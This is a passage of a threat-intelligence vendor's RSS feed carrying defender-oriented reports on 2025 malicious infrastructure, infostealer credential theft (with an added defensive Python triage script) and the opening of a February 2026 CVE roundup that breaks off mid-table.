      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_16fe3d928ba14ff57277e6047a05663f3be02b365.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[2025 Year in Review: Malicious Infrastructure]]></title>
            <link>https://www.recordedfuture.com/ko/research/2025-year-in-review-malicious-infrastructure</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/2025-year-in-review-malicious-infrastructure</guid>
            <pubDate>Thu, 19 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore Insikt Group’s 2025 Malicious Infrastructure Report. Gain insights into Cobalt Strike, Vidar infostealers, and AI-driven threats to secure your 2026 strategy.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>In 2025, Insikt Group significantly expanded its tracking of malicious infrastructure, broadening coverage across additional malware families and threat categories spanning cybercriminal and APT activity. This expansion included deeper analysis of infrastructure types, enhanced integration of data sources such as Recorded Future Network Intelligence®, improved threat detection methodologies, more granular higher-tier infrastructure insights, expanded victimology analysis, and a new focus on so-called threat activity enablers (TAEs). While many patterns identified in 2024 persisted, including Cobalt Strike’s dominance among offensive security tools (OSTs), AsyncRAT and QuasarRAT leading the remote access trojan (RAT) landscape, the widespread use of open-source or cracked malware variants, and the continued prevalence of Android malware within the mobile threat ecosystem, Insikt Group observed several notable shifts and emerging trends throughout 2025.</p>
        <p>For example, although Cobalt Strike remained the most prominent OST, its relative share of detected command-and-control (C2) servers declined as detection coverage expanded and competing tools gained traction. Tools such as RedGuard, Ligolo, and Supershell saw significant growth in use throughout 2025. Following law enforcement disruption efforts targeting LummaC2, Vidar and other infostealers partially filled the gap, reflecting continued volatility in the infostealer ecosystem. Similar fluctuations were observed in the loader and dropper landscape, where new malware families consistently emerged, including CastleLoader, attributed to GrayBravo. Additionally, Insikt Group observed sustained and widespread use of traffic distribution systems (TDS), including activity by TAG-124, GrayCharlie, and other threat actors.</p>
        <p>Defenders should leverage the insights from this report to strengthen security controls by prioritizing the detection and mitigation of the most prevalent malware families and infrastructure techniques. This includes enhancing network monitoring capabilities and deploying relevant detection mechanisms such as YARA, Sigma, and Snort rules. Organizations should also invest in tracking evolving malicious infrastructure dynamics, conducting threat simulations to validate their defensive posture, and maintaining continuous monitoring of the broader threat landscape. With respect to legitimate infrastructure services (LIS), defenders must carefully balance blocking, flagging, or allowing high-risk services based on assessed criticality and organizational risk tolerance.</p>
        <p>As malicious infrastructure continues to evolve alongside improving detection capabilities, Insikt Group anticipates that many current trends will persist into 2026. Rather than dramatic shifts, change is likely to be driven by incremental innovation, adaptation to defensive measures, and reactions to public reporting and law enforcement actions. Threat actors are expected to continue leveraging legitimate tools, services, and content delivery networks (CDNs) such as Cloudflare, a pattern also heavily observed among multiple APT groups, to blend malicious activity with legitimate traffic. While not yet widely observed at the infrastructure layer, Insikt Group assesses that artificial intelligence may increasingly be leveraged to support evasion and operational resilience. The “as-a-service” ecosystem is likely to continue expanding across malware categories, enabling scalability and lowering barriers to entry for threat actors. Although public reporting and sanctions targeting certain TAEs have triggered increased scrutiny, the ecosystem’s underlying economic and operational logic is expected to remain intact, allowing established actors to continue operating. At the same time, Insikt Group anticipates increasingly assertive international law enforcement actions targeting malicious infrastructure, including coordinated takedowns and other disruption efforts.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Infostealers remained the primary infection vector in 2025, with malware-as-a-service (MaaS) offerings dominating. Vidar outperformed competitors, Lumma proved resilient despite law enforcement and doxxing pressure, and the wider ecosystem remained highly volatile.</li>
          <li>Cobalt Strike retained clear dominance in OST detections (~50%) despite declining share, while Metasploit and Mythic held their positions. RedGuard, Ligolo, and Supershell expanded notably, and jQuery again led as the most prevalent malleable C2 profile by detections and geographic reach.</li>
          <li>The malware ecosystem remained anchored in MaaS and open-source tooling across desktop and mobile, with AsyncRAT and Quasar RAT leading the RAT landscape, DcRAT and REMCOS RAT gaining share, and families such as XWorm, SectopRAT, and GOSAR entering the top tier, while Android dominated mobile activity (nine of the top ten families) amid rising use of mercenary spyware.</li>
          <li>Droppers, loaders, and TDS remained dynamic but resilient in 2025, with high loader turnover following Operation Endgame 2024, driven by Latrodectus expansion and the rise of MintsLoader and GrayBravo’s CastleLoader, alongside sustained and widespread TDS activity linked to TAG-124, GrayCharlie, and other threat actors.</li>
          <li>Lastly, in 2025, Insikt Group pivoted to identifying TAEs via the Threat Density List, highlighting high-risk networks such as Virtualine Technologies, often transiting via aurologic GmbH, that sustained operations through Regional Internet Registry (RIR) resource abuse and rapid rebranding despite sanctions and law enforcement pressure.</li>
        </ul>
        <h2>Background</h2>
        <p>Insikt Group proactively identifies and monitors infrastructure linked to hundreds of malware families, threat actors, and related artifacts, including phishing kits, scanners, and relay networks. Through daily, automated validation using proprietary methods, Insikt Group delivers accurate risk representation, enabling Recorded Future customers to strengthen their detection and defense capabilities.</p>
        <p>Building on Insikt Group’s annual malicious infrastructure reports from <a href="https://www.recordedfuture.com/ko/research/2022-adversary-infrastructure-report">2022</a>, <a href="https://www.recordedfuture.com/ko/research/2023-adversary-infrastructure-report">2023</a>, and <a href="https://www.recordedfuture.com/ko/research/2024-malicious-infrastructure-report">2024</a>, this year’s report delivers a concise, data-driven overview of malicious infrastructure observed throughout 2025. While the percentages presented throughout the report are intended to provide insight into trends and the state of malicious infrastructure in 2025, it is important to note that Insikt Group continuously adds new detections for both existing and emerging families, which makes year-over-year comparisons imperfect.</p>
        <p>This year, the focus continues to be on the synergy between passive infrastructure detection, higher-tier infrastructure insights powered by <a href="https://support.recordedfuture.com/hc/en-us/articles/360020582674-Recorded-Future-Network-Intelligence">Recorded Future Network Intelligence</a>, and victim identification. It also expands to examine trends across the ecosystem of TAEs that underpin cyber threats, including how sanctions against selected entities have reshaped that landscape. Overall, this report is intended for anyone interested in malicious infrastructure, providing a high-level overview of its current state along with summaries of key findings to support informed decision-making and offer a broad perspective on this rapidly evolving landscape.</p>
        <p>Recognizing the challenge of categorizing malware types in a mutually exclusive manner due to their overlapping functionalities, this report establishes a set of malware categories to facilitate analysis, as detailed in Appendix A, with brief definitions for each. Notably, certain malware categories, such as crypters, have been intentionally excluded because they typically lack network artifacts.</p>
        <p>Beyond examining malicious infrastructure through the lens of malware categories, Insikt Group also monitors it by type, assigning each a distinct risk score within the Recorded Future Intelligence Operations Platform®. This differentiation reflects varying levels of severity. For instance, network traffic to or from a C2 server in a corporate network may indicate a higher risk compared to the presence of a management panel, as the former typically implies active malicious activity. The infrastructure types defined by Insikt Group are detailed in Appendix B.</p>
        <p><a href="https://assets.recordedfuture.com/insikt-report-pdfs/2026/cta-2026-0319.pdf">Download the full report</a></p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_1c826d2a3e8f6fd7496b1368f37ed9a99ce300731.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[2025 Identity Threat Landscape Report: Inside the Infostealer Economy: Credential Threats in 2025]]></title>
            <link>https://www.recordedfuture.com/ko/blog/identity-trend-report-march-blog</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/identity-trend-report-march-blog</guid>
            <pubDate>Mon, 16 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Recorded Future's 2025 Identity Threat Landscape Report analyzes hundreds of millions of compromised credentials to reveal how infostealer malware is evolving, which systems attackers are targeting, and what security teams must do to get ahead of credential-based breaches.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Credential theft is the dominant initial access vector for enterprise breaches. In 2025, Recorded Future detected:</p>
        <ul>
          <li>1.95 billion malware combo list credential exposures</li>
          <li>36 million database combo list credential exposures</li>
          <li>24 million database dump credential exposures</li>
          <li>892 million malware log credential exposures</li>
        </ul>
        <p>Five findings stand out from the data:</p>
        <ol>
          <li><strong>Credential theft accelerated as the year progressed.</strong> Recorded Future identified 50% more credentials in the second half of 2025 than in the first half of the year. 90% more credentials were identified in the last three months of the year than in the first three months.</li>
          <li><strong>Stolen credentials are targeted, not random.</strong> Of the 7 million credentials indexed with identifiable authorization URLs, 63.2% were tied to authentication systems. VPNs, RMM tools, cloud platforms, and detection software also featured prominently — meaning attackers are often going directly for the systems that provide the broadest access and, in some cases, the ability to blind security teams entirely.</li>
          <li><strong>Infostealer malware is outpacing traditional breach detection.</strong> Each compromised device yielded an average of 87 stolen credentials. The scale and precision of modern infostealers means a single infected endpoint — including a personal device used to access corporate systems — can expose an entire organization.</li>
          <li><strong>MFA alone is no longer sufficient protection.</strong> 276 million of the credentials indexed in 2025 included active session cookies, meaning attackers can bypass multi-factor authentication entirely. This represents 31% of all malware-sourced credentials.</li>
          <li><strong>Detection speed is the decisive advantage.</strong> Over half of all credentials (53%) were indexed within one week of exfiltration, and 36.4% within 24 hours. Organizations that act on intelligence quickly can intervene before stolen credentials are exploited.</li>
        </ol>
        <h2>The Scale of the Problem: Compromised Credentials in 2025</h2>
        <h3>Volume Grew Throughout the Year</h3>
        <p>Credential compromise from malware logs was not a static risk in 2025 — it compounded. Recorded Future observed a consistent upward trend throughout the year, with the second half producing 50% more indexed credentials than the first.</p>
        <p>The final three months of the year were particularly active: they saw 90% more volume than the first three months, reflecting both the continued proliferation of infostealer malware-as-a-service (MaaS) and the disruption and reformation of major malware families mid-year (covered in detail in the malware section below).</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_100437fc59ff266567d6d895e1cfa0d0d64a78e6c.png?width=750&amp;format=png&amp;optimize=medium" width="1024" height="434" />
            </div>
          </div>
          <div>
            <div>CHART 1: Monthly credential volume from malware logs, full year 2025 (Source: Recorded Future)</div>
          </div>
        </div>
        <p>What this means for security teams: Seasonal or quarterly threat reviews are insufficient. The volume and pace of credential exposure in 2025 demands continuous monitoring — not periodic audits.</p>
        <h3>What Do Those Credentials Actually Unlock?</h3>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a62ce422e875506eaab3067aac23093b66512971.png?width=750&amp;format=png&amp;optimize=medium" width="932" height="599" />
            </div>
          </div>
          <div>
            <div>CHART 2: Top authorization URL categories, 2025 (Source: Recorded Future)</div>
          </div>
        </div>
        <p>More credentials exposed means more doors open to attackers. The authorization URL data from 2025 reveals exactly which doors they're targeting — and the picture is stark.</p>
        <p>Of the 7 million credentials with high-risk authorization URLs indexed in 2025, 63.2% were tied to authentication systems. The next largest categories were web content management (9.95%) and cloud computing (7.58%), followed by remote monitoring and management tools (6.19%) and email infrastructure (3.87%).</p>
        <p>This is not a random distribution. Authentication systems, cloud platforms, and remote access tools — VPNs at 2.4% and RMM tools at 6.19% — are precisely the systems that give attackers the broadest foothold inside an organization. A single stolen credential for an authentication portal or VPN can serve as the entry point for lateral movement, privilege escalation, and ultimately a full breach.</p>
        <p>The presence of detection and response software (1.17%) and SIEM platforms (0.06%) in this list is particularly notable. Credentials for the tools organizations rely on to detect attacks are themselves being stolen — giving attackers the ability to blind security teams before they strike.</p>
        <p>What this means for security teams: The value of a stolen credential is determined by what it unlocks. Prioritize monitoring and rapid response for credentials tied to authentication systems, remote access tools, cloud infrastructure, and security platforms — these can represent the highest-leverage targets for attackers operating with stolen credentials.</p>
        <h3>A Global Problem With Regional Concentration</h3>
        <p>Compromised credentials were indexed from organizations across the globe. The ten countries with the highest credential volume in 2025 were:</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1b91e7f35209bbe3196cde31382adc2ead95cc599.png?width=750&amp;format=png&amp;optimize=medium" width="740" height="477" />
            </div>
          </div>
          <div>
            <div>Table 1: Credentials indexed by country (Source: Recorded Future)</div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1ca316c640ac71930edee449150b110dace9a3120.png?width=750&amp;format=png&amp;optimize=medium" width="1024" height="590" />
            </div>
          </div>
          <div>
            <div>MAP 1: Credentials indexed by country (Source: Recorded Future)</div>
          </div>
        </div>
        <p>The breadth of this data underscores that credential theft is not concentrated in a single region or industry — it is a universal risk. Organizations with global workforces, multinational supply chains, or international customer bases face exposure across multiple geographies simultaneously.</p>
        <h2>The Anatomy of a Compromise: What Attackers Actually Steal</h2>
        <h3>87 Credentials Per Device</h3>
        <p>When an employee's device is infected with infostealer malware, the damage rarely stops at one account. In 2025, the average compromised device yielded 87 stolen credentials — spanning corporate applications, personal accounts, and cloud services accessed from the same machine.</p>
        <p>Recorded Future's Compromised Host Incident Reports surface the full scope of each device-level infection, including the malware family responsible, file paths, IP addresses, and infection timelines. This context is what separates actionable intelligence from a list of leaked passwords.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_18e329ab6afb10fd7fcfa888764ed37e99a49b591.png?width=750&amp;format=png&amp;optimize=medium" width="1532" height="1600" />
            </div>
          </div>
          <div>
            <div>Image 1: Incident Report results in Recorded Future <a href="https://www.recordedfuture.com/ko/products/identity-intelligence">Identity Intelligence</a></div>
          </div>
        </div>
        <p>What this means for security teams: A single alert should trigger a device-level incident response, not just a password reset. Understanding what else was on that machine — and what else may have been exfiltrated — is essential to containing the full extent of the exposure.</p>
        <h3>The Cookie Problem: Why MFA Isn't Enough</h3>
        <p>One of the most significant findings from 2025 is the volume of credentials that included active session cookies alongside stolen passwords. Recorded Future indexed 276 million credentials with cookies — 31% of all malware-sourced credentials — a figure that grew 30% from the first half of the year to the second half.</p>
        <p>Session cookies allow attackers to authenticate as a user without entering a password or completing an MFA challenge. They effectively render secondary authentication controls irrelevant for as long as the session remains active.</p>
        <p>December was the single highest month for cookie-bearing credential exposure, indexing 18% more than the next highest month (November).</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_179d0293bed7183e9a44a23b2349ec0d9380d8e99.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="741" />
            </div>
          </div>
          <div>
            <div>CHART 3: Monthly volume of credentials with cookies, 2025 (Source: Recorded Future)</div>
          </div>
        </div>
        <p>What this means for security teams: MFA enrollment is necessary but not sufficient. Organizations should monitor for session cookie theft specifically, enforce shorter session token lifespans for high-risk applications, and treat any credential exposure from an infostealer log as a potential authentication bypass — not just a password reset trigger.</p>
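        <p>As an added example that is not part of the Recorded Future report, the Python routine below turns the two recommendations above into triage logic: it classifies an infostealer-sourced credential by what its authorization URL unlocks (authentication, VPN, RMM, cloud, SIEM/EDR), escalates to critical whenever a session cookie accompanied the credential, always queues session invalidation ahead of the password reset, opens a device-level incident for the infected host, and flags exposures indexed more than a week after exfiltration. The asset inventory, hostnames, keyword heuristics, and sample records are constructed assumptions, not data from the report.</p>

```python
"""Triage infostealer-log credential exposures by leverage and session-cookie presence.

Added example (not the report's code). The inventory, hostnames and sample
records below are constructed for illustration.
"""
from dataclasses import dataclass
from datetime import datetime
from typing import Iterable, List, Tuple
from urllib.parse import urlparse

# Hypothetical asset inventory: hostname -> system category (assumed; a real
# deployment would source this from a CMDB or identity provider).
ASSET_CATEGORIES = {
    "sso.example.com": "authentication",
    "vpn.example.com": "vpn",
    "rmm.example.com": "rmm",
    "console.cloud.example.com": "cloud",
    "siem.example.com": "siem",
    "intranet.example.com": "web_cms",
}

# Constructed keyword fallback for hosts missing from the inventory.
KEYWORD_CATEGORIES = [
    (("sso", "login", "auth", "idp"), "authentication"),
    (("vpn",), "vpn"),
    (("rmm", "remote"), "rmm"),
    (("cloud", "console"), "cloud"),
    (("siem", "edr", "xdr"), "siem"),
]

# Categories the report singles out as giving an attacker the broadest foothold.
HIGH_LEVERAGE = {"authentication", "vpn", "rmm", "cloud", "siem"}
ONE_WEEK_HOURS = 7 * 24


@dataclass(frozen=True)
class Exposure:
    username: str
    authorization_url: str
    has_cookie: bool          # a live session cookie was captured with the password
    exfiltrated_at: datetime  # time the log was taken from the infected host
    indexed_at: datetime      # time the exposure became visible to defenders
    host_id: str              # infected device, for the device-level incident


@dataclass(frozen=True)
class Triage:
    category: str
    severity: str
    actions: Tuple[str, ...]
    detection_lag_hours: float


def categorize(url: str) -> str:
    """Map an authorization URL to a system category; inventory wins over keywords."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if host in ASSET_CATEGORIES:
        return ASSET_CATEGORIES[host]
    path = parsed.path.lower()
    for keywords, category in KEYWORD_CATEGORIES:
        if any(k in host or k in path for k in keywords):
            return category
    return "other"


def triage(exp: Exposure) -> Triage:
    category = categorize(exp.authorization_url)
    lag = (exp.indexed_at - exp.exfiltrated_at).total_seconds() / 3600
    # A stolen cookie is an MFA bypass, so it is critical regardless of target;
    # high-leverage systems are critical too. Everything else is still high,
    # because the same infected host typically leaked many other credentials.
    severity = "critical" if (exp.has_cookie or category in HIGH_LEVERAGE) else "high"
    # Session invalidation comes first: a reset alone leaves a live cookie usable.
    actions: List[str] = ["invalidate_sessions", "reset_password",
                          "open_device_incident", "notify_manager"]
    if category == "siem":
        actions.append("review_siem_audit_log")  # detection tooling may have been tampered with
    if lag > ONE_WEEK_HOURS:
        actions.append("assume_credential_used")  # indexed long after theft
    return Triage(category, severity, tuple(actions), lag)


def prioritize(exposures: Iterable[Exposure]) -> List[Exposure]:
    """Order the response queue: critical first, cookies first, then leverage, then freshness."""
    def key(e: Exposure):
        t = triage(e)
        return (t.severity != "critical", not e.has_cookie,
                t.category not in HIGH_LEVERAGE, t.detection_lag_hours)
    return sorted(exposures, key=key)


# Constructed sample records standing in for three infostealer-log entries.
SAMPLE_EXPOSURES = [
    Exposure("alice", "https://sso.example.com/login", True,
             datetime(2025, 12, 1, 8), datetime(2025, 12, 1, 20), "host-01"),
    Exposure("bob", "https://intranet.example.com/wp-login.php", False,
             datetime(2025, 11, 20), datetime(2025, 12, 2), "host-02"),
    Exposure("carol", "https://siem.example.com/", False,
             datetime(2025, 12, 3), datetime(2025, 12, 3, 6), "host-03"),
]

if __name__ == "__main__":
    for e in prioritize(SAMPLE_EXPOSURES):
        t = triage(e)
        print(f"{e.username:6} {t.category:15} {t.severity:9} {t.detection_lag_hours:6.1f}h {t.actions}")
```

        <p>Note that the inventory lookup is checked before the keyword fallback on purpose: a login page on the intranet CMS stays in the web-CMS bucket rather than being mistaken for the identity provider, while an unknown host whose name contains "vpn" still lands in the high-leverage set.</p>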
        <h2>The Infostealer Ecosystem: How the Malware Landscape Shifted in 2025</h2>
        <h3>LummaC2: The Year's Dominant Threat</h3>
        <p>LummaStealer emerged as the most widely deployed infostealer of 2025. Operating under a malware-as-a-service model since late 2022, it matured significantly over the past year, targeting Windows systems to harvest browser credentials, session cookies, cryptocurrency wallets, and two-factor authentication tokens.</p>
        <p>Its distribution relied heavily on social engineering — fake software downloads and "ClickFix" techniques that trick users into executing malicious commands disguised as CAPTCHA challenges. Recent campaigns used CastleLoader for delivery, running obfuscated payloads in memory to evade detection.</p>
        <p>In May 2025, a coordinated law enforcement action neutralized more than 2,300 LummaC2 command-and-control domains. The disruption was significant — but not fatal. LummaStealer operators migrated to bulletproof hosting services and employed sophisticated sandbox evasion techniques, including trigonometric analysis of mouse movements to avoid automated detection environments. Activity continued under private, select-affiliate operations through the remainder of the year.</p>
        <h3>How the Rest of the Ecosystem Responded</h3>
        <p>The 2025 infostealer landscape was shaped as much by law enforcement disruption as by attacker innovation. Each takedown created a vacuum that other malware families quickly filled.</p>
        <p>Early 2025: The late-2024 law enforcement actions against RedLine and META pushed users toward emerging MaaS alternatives, consolidating volume around LummaC2 and accelerating its dominance through Q2.</p>
        <p>Mid-2025: Following the LummaC2 disruption in May, established families — Rhadamanthys, Vidar, and StealC — absorbed the displaced activity. Rhadamanthys led through the summer until its own infrastructure was taken down by law enforcement in November 2025. Vidar stepped into the lead position thereafter.</p>
        <p>Rebranding as a survival strategy: Disruption prompted reinvention. StealC relaunched as StealC v2. Vidar operators attempted a similar rebrand. These moves reflect a deliberate effort by malware developers to obscure continuity and frustrate attribution.</p>
        <p>macOS: Atomic macOS Stealer (AMOS) dominated the macOS market through most of 2025, disappearing in October before returning in February 2026. MacSync (formerly Mac.C) emerged as the primary commodity macOS infostealer by year end.</p>
        <p>Private operations grew: Increased law enforcement pressure on publicly accessible MaaS tools pushed sophisticated threat actors toward private infostealers with restricted affiliate access. Acreed (also known as ACR Stealer) and Odyssey Stealer represented the most significant private-operation families of 2025. Private Lumma operations also continued post-disruption.</p>
        <p>What this means for security teams: Malware family names change. Takedowns create temporary disruption, not permanent resolution. Organizations that track exposure by malware family rather than only by leaked credential volume will be better positioned to understand the true source and scope of each incident.</p>
        <h2>Recommendations for Security Teams</h2>
        <p>The 2025 data points to four areas where security teams can meaningfully reduce their exposure to credential-based attacks.</p>
        <p>1. Extend monitoring to personal devices. The majority of infostealer infections occur on personal devices used to access corporate systems — a risk that endpoint detection tools and traditional perimeter controls cannot address. Monitoring infostealer malware logs directly provides visibility into these exposures before they are weaponized.</p>
        <p>One large automotive parts distributor found that Recorded Future surfaced stolen credentials tied to an employee's personal device — an exposure their existing tools had no visibility into and would likely never have caught.</p>
        <p>2. Treat session cookie exposure as a critical-severity event. With 276 million credentials carrying active cookies in 2025, any infostealer-sourced credential exposure should trigger immediate session invalidation in addition to a password reset. MFA bypass via stolen cookies is not a theoretical threat — it is an observed, frequent attack pattern.</p>
        <p>3. Automate response workflows to close the detection-to-remediation gap. The data shows that most credentials are indexed within days of theft. Organizations that have pre-built response playbooks — automatically checking Active Directory, clearing sessions, forcing resets, and notifying managers — respond in minutes rather than hours.</p>
        <p>"We created a custom SOAR playbook using the Identity Intelligence module. This playbook takes the information of compromised corporate user accounts, runs an Active Directory check for the credentials, clears user sessions and resets the password if the account is found to be compromised. It also notifies the user's manager for email response. To date, we have processed over 330 different identity alerts." — Bryan Cassidy, Lead Cyber Defense Engineer, 7-Eleven (<a href="https://app.userevidence.com/assets/2701BQGV">UserEvidence</a>)</p>
        <p>4. Monitor your entire domain footprint — including subsidiaries and third parties. Some of the most consequential exposures in 2025 involved obscure subsidiaries and supply chain partners, not core corporate domains. Attackers do not limit themselves to obvious targets. Security teams shouldn't limit their monitoring to obvious domains either.</p>
        <p>One large international financial services firm detected an infostealer on a third-party service provider's machine through Recorded Future — surfacing a supply chain exposure that would have been invisible through traditional monitoring alone.</p>
        <h2>The Recorded Future Advantage: Detection Speed – From Exfiltration to Alert in Hours</h2>
        <p>The gap between when credentials are stolen and when a security team finds out is where breaches happen. Most organizations discover compromised credentials days or weeks after the fact — through a public breach disclosure, a tip from law enforcement, or an incident that's already underway.</p>
        <p>Recorded Future closes that gap. In 2025, 36.4% of all indexed credentials were detected within 24 hours of exfiltration, and 52.9% within one week. By the time stolen credentials are being traded or weaponized, Recorded Future customers have already been alerted.</p>
        <div>
          <div>
            <div>Credential Exfiltration Breakdown</div>
          </div>
          <div>
            <div>Within 24 hours</div>
            <div>36%</div>
          </div>
          <div>
            <div>Within 1 week</div>
            <div>53%</div>
          </div>
          <div>
            <div>Within 1 month</div>
            <div>85%</div>
          </div>
          <div>
            <div>Within 1 year</div>
            <div>99%</div>
          </div>
          <div>
            <div>Over 1 year</div>
            <div>1%</div>
          </div>
        </div>
        <p>Table 2: Exfiltration freshness breakdown (Source: Recorded Future)</p>
        <p>Speed matters because attackers move fast. Infostealer logs are often listed for sale within hours of collection. Every day between exfiltration and detection is a day an attacker may already have access. The 15.3% of credentials not detected within a month illustrate what happens when that window stays open — extended attacker dwell time, lateral movement, and incidents that escalate into major breaches.</p>
        <p>For Recorded Future customers, early detection is only half the equation. Pre-built integrations with Okta, Microsoft Entra ID, and SOAR platforms like XSOAR mean that when a credential alert fires, automated workflows can clear sessions, force password resets, and notify managers — without waiting for an analyst to pick up the ticket.</p>
        <p>A large international financial services firm's Team Lead described a recent credential leak: identified and escalated in under 24 hours, triggering immediate automated remediation — exactly the outcome their team had built toward.</p>
        <h2>Appendix: Notable Passwords from 2025 Credential Exposures</h2>
        <p>The following passwords appeared most frequently across credentials indexed by Recorded Future in 2025. Their prevalence reflects the continued gap between password policies and actual user behavior — and the reason why credential monitoring cannot rely on password complexity alone as a proxy for risk.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1f94cdabb3370ab7cf99bcab6358d5be3aa72aad0.png?width=750&amp;format=png&amp;optimize=medium" width="1306" height="312" />
        </p>
        <h2>About This Report</h2>
        <p>This report is based on data indexed by Recorded Future's Identity Intelligence Module across the full calendar year 2025. Recorded Future monitors credentials across open web, dark web, paste sites, Telegram channels, and infostealer malware logs sourced from 30+ malware families. All credential data can be processed and analyzed without storing plaintext passwords in customer-facing systems.</p>
        <h2>Find out What’s Already Exposed in Your Environment</h2>
        <p>The data in this report reflects the broader threat landscape. The question is how much of it applies to your organization specifically.</p>
        <p>Recorded Future's complimentary Identity Exposure Assessment pulls directly from the Recorded Future Intelligence Graph to show you the volume, recency, and severity of your organization's credential exposure over the past year — including compromised employee credentials, infostealer-sourced data, and how your exposure has trended over time.</p>
        <p>There's no commitment required. Just a clear picture of where your organization stands.</p>
        <p><a href="https://pages.recordedfutureext.com/IdentityExposureReport_LandingPage.html">Get your complimentary Identity Exposure Assessment →</a></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1546ac0dd95673dede4cdd0ced6a52f34d677471c.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[February 2026 CVE Landscape: 13 Critical Vulnerabilities Mark 43% Drop from January]]></title>
            <link>https://www.recordedfuture.com/ko/blog/february-2026-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/february-2026-cve-landscape</guid>
            <pubDate>Thu, 12 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[February 2026 saw a 43% decrease in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 13 vulnerabilities requiring immediate remediation, down from 23 in January 2026.]]></description>
            <content:encoded><![CDATA[
        <p>February 2026 saw a 43% decrease in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying <strong>13 vulnerabilities</strong> requiring immediate remediation, down from <a href="https://www.recordedfuture.com/ko/blog/january-2026-cve-landscape">23 in January 2026</a>. All 13 carried a ‘Very Critical’ Recorded Future Risk Score.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>Microsoft dominates:</strong> Six of 13 vulnerabilities affected Microsoft products, accounting for 46% of February's findings; all were added to CISA's KEV catalog on the same day</li>
          <li><strong>Supply-chain attack on Notepad++:</strong> Lotus Blossom, a suspected China state-sponsored threat actor, exploited CVE-2025-15556 to hijack Notepad++'s update channel and deliver a Cobalt Strike Beacon and the Chrysalis backdoor</li>
          <li><strong>APT28 exploits MSHTML flaw:</strong> The Russian state-sponsored group leveraged CVE-2026-21513 via malicious Windows Shortcut files for multi-stage payload delivery</li>
          <li><strong>Public exploits available:</strong> Four of 13 vulnerabilities have publicly available proof-of-concept code; an alleged exploit for a fifth is being advertised for sale</li>
        </ul>
        <p><strong>Bottom line:</strong> Despite a 43% drop in volume, February's vulnerabilities include named threat actor exploitation and five RCE-enabling flaws, making prioritized, intelligence-driven remediation as important as ever.</p>
        <h2><strong>Quick Reference: February 2026 Vulnerability Table</strong></h2>
        <p><em>All 13 vulnerabilities below were actively exploited in February 2026.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk</strong><br /><strong>Score</strong></div>
            <div><strong>Affected Vendor/Product</strong></div>
            <div><strong>Vulnerability Type/Component</strong></div>
            <div><strong>Public PoC</strong></div>
          </div>
          <div>
            <div>1</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BD2JXlW/overview">CVE-2025-15556</a></div>
            <div>99</div>
            <div>Notepad++</div>
            <div>CWE-494 (Download of Code Without Integrity Check)</div>
            <div><a href="https://github.com/George0Papasotiriou/CVE-2025-15556-Notepad-WinGUp-Updater-RCE">Yes</a></div>
          </div>
          <div>
            <div>2</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BECGjWe/overview">CVE-2026-1731</a></div>
            <div>99</div>
            <div>BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA)</div>
            <div>CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))</div>
            <div><a href="https://github.com/win3zz/CVE-2026-1731">Yes</a></div>
          </div>
          <div>
            <div>3</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEF-/overview">CVE-2026-21510</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-693 (Protection Mechanism Failure)</div>
            <div>No</div>
          </div>
          <div>
            <div>4</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGB/overview">CVE-2026-21513</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-693 (Protection Mechanism Failure)</div>
            <div>No</div>
          </div>
          <div>
            <div>5</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGC/overview">CVE-2026-21514</a></div>
            <div>99</div>
            <div>Microsoft Office</div>
            <div>CWE-807 (Reliance on Untrusted Inputs in a Security Decision)</div>
            <div>No</div>
          </div>
          <div>
            <div>6</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGG/overview">CVE-2026-21519</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-843 (Access of Resource Using Incompatible Type ('Type Confusion'))</div>
            <div>No</div>
          </div>
          <div>
